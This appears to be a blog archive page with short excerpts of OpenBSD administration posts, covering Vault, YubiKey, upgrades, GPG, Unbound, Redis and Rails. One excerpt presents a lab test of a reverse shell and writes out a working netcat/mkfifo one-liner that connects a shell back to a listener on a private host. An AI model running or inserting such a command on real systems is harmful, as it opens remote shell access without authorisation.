OpenBSD

Vault on OpenBSD

how to Install and run Hashicorp Vault on OpenBSD in addition to [https://blog.stoege.net/categories/vault/](this Blog Entry), here some instructions for OpenBSD. Requirements VM with OpenBSD 7.2 (or older …) and root/doas permission Domain, or at least a FQDN Name pointing to your VM HTTP/HTTPS allowed from Internet (for Certificate Generation) Nginx installed (pkg_add nginx) Source https://developer.hashicorp.com/vault/docs/get-started/developer-qs Install Vault all the Steps must be run as root (or with doas) pkg_add vault Vault Config Backup the prev.

Yubikey - on OpenBSD

Running YubiKey on OpenBSD buy a Key and give try … Source https://www.yubico.com/ Install Software pkg_add yubikey-manager-3.1.2p4 pkg_add yubikey-manager-3.1.2p4 quirks-6.42 signed on 2023-01-08T01:39:04Z yubikey-manager-3.1.2p4:py3-click-7.1.2: ok yubikey-manager-3.1.2p4:py3-pyusb-1.0.2p5: ok yubikey-manager-3.1.2p4:pcsc-lite-1.9.8: ok yubikey-manager-3.1.2p4:py3-cparser-2.19p2: ok yubikey-manager-3.1.2p4:py3-cffi-1.15.1: ok yubikey-manager-3.1.2p4:py3-cryptography-38.0.0p0: ok yubikey-manager-3.1.2p4:py3-pyscard-2.0.3: ok yubikey-manager-3.1.2p4:py3-openssl-22.0.0: ok yubikey-manager-3.1.2p4:libyubikey-1.13p4: ok yubikey-manager-3.1.2p4:json-c-0.16: ok yubikey-manager-3.1.2p4:ykpers-1.20.0p2: ok yubikey-manager-3.1.2p4: ok The following new rcscripts were installed: /etc/rc.d/pcscd See rcctl(8) for details. --- +yubikey-manager-3.1.2p4 ------------------- NOTE: yubikey-manager (ykman) is only partially functional on OpenBSD. Most of the "ykman fido xxx" commands (pin-setting and others) stall.

OpenBSD 7.2

OpenBSD 7.2 finally released. Yesterday, the 53th Relase of OpenBSD got publised, the [Version 7.2)(https://www.openbsd.org/72.html). I’ll upgrade my boxes as usual with the following Script. The most obvious change is the Performance improvement for the Package Mangager, but there is always so more see undeadly Upgrade Guide As usual, follow to official Upgrade Guide. You can Upgrade with an USB Stick, ISO Image, PXE Boot or inline (from a running system).

GPG & Gopass & Gitlab

GPG and how to use it Create a Key with ECC gpg --expert --full-generate-key (9) ECC and ECC (1) Curve 25519 0 = key does not expire (or whatever you prefer!) Real name: Max Muster Email address: max@muster.net Comment: - pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid Max Muster (-) <max@muster.net> sub cv25519 2022-09-04 [E] Public Key max@host $ gpg /home/max/.gnupg/pubring.kbx ---------------------------- pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid [ultimate] Max Muster (-) <max@muster.

OpenBSD - ReverseShell

Reverse Shells https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://kb.systemoverlord.com/security/postex/reverse/ Test it Listen on Host A Set Lister on Host A (192.168.1.100) hostA # nc -l 4242 Start Reverse Shell on Host B hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f here we are hostA # hostname hostA.somewhere hostA # nc -l 4242 hostB # hostname hostB.somewhere nice ;) sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

PuffyPages

some cool pages about OpenBSD https://www.openbsd.org https://man.openbsd.org https://www.openbsdfoundation.org https://marc.info https://undeadly.org/cgi?action=front https://bsdly.blogspot.com/ https://obsd.solutions/en/blog/ https://dataswamp.org/~solene/ https://blog.apnic.net/2021/10/28/openbsd-part-1-how-it-all-started/ + https://blog.apnic.net/2021/11/05/openbsd-part-2-why-use-openbsd/ https://vincentdelft.be/category/openbsd http://ratfactor.com/openbsd/2022-08-02-install https://blog.lambda.cx/tags/openbsd/ https://www.openbsdjumpstart.org/#/ https://blog.lambda.cx/posts/openbsd-introduction-talk/openbsd-introduction.pdf https://why-openbsd.rocks/fact/ https://openbsdrouterguide.net/ https://blog.obtusenet.com/ http://kestrel.nmt.edu/~raymond/software/howtos/openbsd.html sha256: a86099a13463c50993ce9fa2d75543daf1888454259f04daab6240c8a6dec7e9

Sensorsd - UPS Shutdown

Shutdown Hosts on Power Outages Everybody is talking about Power Outages. Let’s assume you have a Smart-UPS for your Playground and you’d like to shut some Infrastructure to avoid some troubles with corrupt filesystems, broken vm’s and things like that. Connection UPS to APU via USB Cable dmesg show the UPS connected APU# dmesg uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ... uhidev0: iclass 3/0, 142 report ids upd0 at uhidev0 uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1 uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1 .

OpenBSD - Full Disk Encryption

Intro I never used the Fulldisk Encryption Feature as there was no need for. It doesn’t make sense for Hosted VM’s, as you have to enter the Passphrase at every boot at the Console. So, it’s a pain and still possible to intercept on the Hosters Infrastructure. Disk Encryption does not make sense at home, as all my Devices remains at home (and hopefully never got stolen). It would make sense on a Notebook, but i’m more the Apple Fanboy when it comes to portable Machines.

JC - JSON from CLI

how to build json from cli we all like json, do we ? https://kellyjonbrazil.github.io/jc/docs/parsers/ping add package doas pkg_add jc try ping openbsd-box # ping -c 3 1.1.1.1 |jc --ping -p 2>/dev/null { "destination_ip": "1.1.1.1", "data_bytes": 56, "pattern": null, "destination": "1.1.1.1", "packets_transmitted": 3, "packets_received": 3, "packet_loss_percent": 0.0, "duplicates": 0, "round_trip_ms_min": 9.219, "round_trip_ms_avg": 9.826, "round_trip_ms_max": 10.158, "round_trip_ms_stddev": 0.43, "responses": [ { "type": "reply", "bytes": 64, "response_ip": "1.1.1.1", "icmp_seq": 0, "ttl": 59, "time_ms": 10.

Unbound - Logging

Enable Logging for Unbound update unbound.conf /var/unbound/etc/unbound.conf server: logfile: /log/unbound.log verbosity: 1 log-queries: yes ... create folder/logfile log=/var/unbound/log/unbound.log doas mkdir /var/unbound/log/ touch $log chmod 660 $log chown _unbound:_unbound $log restart service doas rcctl restart unbound tail logfile tail -f /var/unbound/log/unbound.log # tail -f /var/unbound/log/unbound.log [1660208341] unbound[3279:0] notice: init module 0: validator [1660208341] unbound[3279:0] notice: init module 1: iterator [1660208341] unbound[3279:0] info: start of service (unbound 1.15.0). [1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.

Unbound - RemoteControl

How to Enable Remote Control for Unbound Setup Remote Control doas unbound-control-setup $ doas unbound-control-setup setup in directory /var/unbound/etc Generating RSA private key, 3072 bit long modulus ..................................++++ ..................................++++ e is 010001 (0x65537) Generating RSA private key, 3072 bit long modulus ........................................++++ ........................................++++ e is 010001 (0x65537) Signature ok subject=/CN=unbound-control Getting CA Private Key removing artifacts Setup success. Certificates created. Enable in unbound.conf file to use Enable in unbound.conf /var/unbound/etc/unbound.conf

HTMLQ

stumpled upon some thing cool, htmlq! It’s like jq, but for HTML. Installation Rust htmlq need rust. so, let’s install rust first. doas pkg_add rust Add Link to Path cat << 'EOF' |doas tee -a /etc/profile # Rust/Cargo export PATH=$PATH:/root/.cargo/bin EOF . /etc/profile Install HTMLQ doas cargo install htmlq some Examples Extract Links curl -s https://www.openbsd.org | htmlq --attribute href a |head Example user@nixbox$ curl -s https://www.openbsd.org | htmlq --attribute href a |head goals.

OpenBSD 7.2 - Compare

there are a few Weeks until OpenBSD 7.2 will get released. Anyhow, running current is a good way to get a “preview” what’s in the pipeline and will come soon. one of the painpoint was update packages on OpenBSD. Not because it was difficult, but it took quite a lot of time. Specially, when you run a bunch of machines in different networks. Version and Time consumption sysctl kern.version pkg_info |wc -l time pkg_add -Vu OpenBSD 7.

Redis on OpenBSD

let’s play a bit with Redis. A In-Memory Data Store for Caching, Streaming, Message Broker https://redis.io/ Install doas rcctl add redis doas rcctl enable redis doas rcclt restart redis Package Summary what did we got installed ? doas pkg_info -L redis $ doas pkg_info -L redis Information for inst:redis-6.2.7 Files: /etc/rc.d/redis /usr/local/bin/redis-benchmark /usr/local/bin/redis-check-aof /usr/local/bin/redis-check-rdb /usr/local/bin/redis-cli /usr/local/bin/redis-sentinel /usr/local/bin/redis-server /usr/local/share/examples/redis/redis.conf /usr/local/share/examples/redis/sentinel.conf A Server, a Client, a configuration File, … Keep Alive send a ping …

Ruby on Rails

https://github.com/Bratela/openbsd Install Ruby Install Ruby and set Symlinks doas su - pkg_add ruby-3.1.2 ln -sf /usr/local/bin/ruby31 /usr/local/bin/ruby ln -sf /usr/local/bin/bundle31 /usr/local/bin/bundle ln -sf /usr/local/bin/bundler31 /usr/local/bin/bundler ln -sf /usr/local/bin/erb31 /usr/local/bin/erb ln -sf /usr/local/bin/gem31 /usr/local/bin/gem ln -sf /usr/local/bin/irb31 /usr/local/bin/irb ln -sf /usr/local/bin/rdoc31 /usr/local/bin/racc ln -sf /usr/local/bin/rake31 /usr/local/bin/rake ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rbs ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdbg ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdoc ln -sf /usr/local/bin/ri31 /usr/local/bin/ri ln -sf /usr/local/bin/typeprof31 /usr/local/bin/typeprof Install Nokogiri pkg_add ruby31-nokogiri-1.13.1p0 Install Rails pkg_add ruby-3.